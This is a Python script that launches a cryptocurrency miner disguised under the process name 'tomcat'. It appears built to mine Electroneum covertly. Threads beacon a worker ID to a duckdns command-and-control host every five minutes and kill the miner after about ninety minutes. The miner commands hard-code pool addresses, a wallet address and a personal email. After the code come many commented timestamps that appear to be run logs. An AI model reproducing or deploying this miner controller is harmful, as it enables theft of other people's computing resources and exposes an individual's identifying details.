import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:31:08.193328
#2018-02-17 17:19:07.030817
#2018-02-17 19:07:03.840339
#2018-02-17 20:54:01.488851
#2018-02-17 22:41:04.788285
#2018-02-18 00:25:07.661258
#2018-02-18 02:16:03.597506
#2018-02-18 04:03:04.696163
#2018-02-18 05:52:06.839742
#2018-02-18 07:43:07.395682
#2018-02-18 09:31:07.169671
#2018-02-18 11:17:06.904894
#2018-02-18 13:02:06.892282
#2018-02-18 14:51:05.088788
#2018-02-18 16:39:04.957942
#2018-02-18 18:28:03.455125
#2018-02-18 20:14:06.754870
#2018-02-18 22:00:07.186022
#2018-02-18 23:49:06.258388
#2018-02-19 01:35:01.356046
#2018-02-19 03:23:06.827758
#2018-02-19 05:08:05.442114
#2018-02-19 06:53:06.568961
#2018-02-19 08:43:05.017061
#2018-02-19 10:32:06.390540
#2018-02-19 12:20:05.418042
#2018-02-19 14:06:09.458740
#2018-02-19 15:54:08.746352
#2018-02-19 17:42:04.407879
#2018-02-19 19:29:06.032434
#2018-02-19 21:16:06.652835
#2018-02-19 23:02:05.237787
#2018-02-20 00:47:06.915900
#2018-02-20 02:35:06.673530
#2018-02-20 04:23:07.832162
#2018-02-20 06:07:02.053791
#2018-02-20 07:52:05.706813
#2018-02-20 09:37:04.274164
#2018-02-20 11:20:07.963285
#2018-02-20 13:07:07.099803
#2018-02-20 14:52:09.346311
#2018-02-20 16:39:07.051535
#2018-02-20 18:26:06.965287
#2018-02-20 20:18:04.285732
#2018-02-20 22:03:01.823225
#2018-02-20 23:43:03.576186
#2018-02-21 01:27:05.318761
#2018-02-21 03:17:03.770929
#2018-02-21 05:04:06.107489
#2018-02-21 06:51:06.975386
#2018-02-21 08:37:06.424193
#2018-02-21 10:22:03.958160
#2018-02-21 12:10:08.479317
#2018-02-21 13:58:09.133997
#2018-02-21 15:44:01.591122
#2018-02-21 17:36:09.930814
#2018-02-21 19:23:06.426448
#2018-02-21 21:12:05.405494
#2018-02-21 22:58:06.822824
#2018-02-22 00:47:08.528983
#2018-02-22 02:36:09.283243
#2018-02-22 04:21:08.187296
#2018-02-22 06:09:05.129736
#2018-02-22 07:54:04.287616
#2018-02-22 09:42:08.682518
#2018-02-22 11:27:01.854266
#2018-02-22 13:12:07.518950
#2018-02-22 15:01:06.571862
#2018-02-22 16:45:01.719880
#2018-02-22 18:31:08.574125
#2018-02-22 20:24:01.335678
#2018-02-22 22:10:08.445562
#2018-02-22 23:56:01.824074
#2018-02-23 01:44:03.872645
#2018-02-23 03:33:06.739828
#2018-02-23 05:19:03.738942
#2018-02-23 07:06:01.697786
#2018-02-23 08:57:03.646169
#2018-02-23 11:14:05.780249
#2018-02-23 13:07:09.386802
#2018-02-23 14:53:08.178651
#2018-02-23 16:43:09.755332
#2018-02-23 18:29:06.783059
#2018-02-23 20:15:08.839290
#2018-02-23 22:04:05.492158
#2018-02-23 23:53:02.067715
#2018-02-24 01:42:01.942083
#2018-02-24 03:32:01.508397
#2018-02-24 05:16:03.909498
#2018-02-24 07:05:06.061518
#2018-02-24 08:52:05.062450
#2018-02-24 10:52:01.285100
#2018-02-24 12:39:04.907758
#2018-02-24 14:27:01.410712
#2018-02-24 16:14:06.950644
#2018-02-24 18:07:02.231326
#2018-02-24 19:53:01.311324
#2018-02-24 21:37:07.070718
#2018-02-25 00:26:07.906934
#2018-02-25 04:14:04.915628
#2018-02-25 07:45:08.596355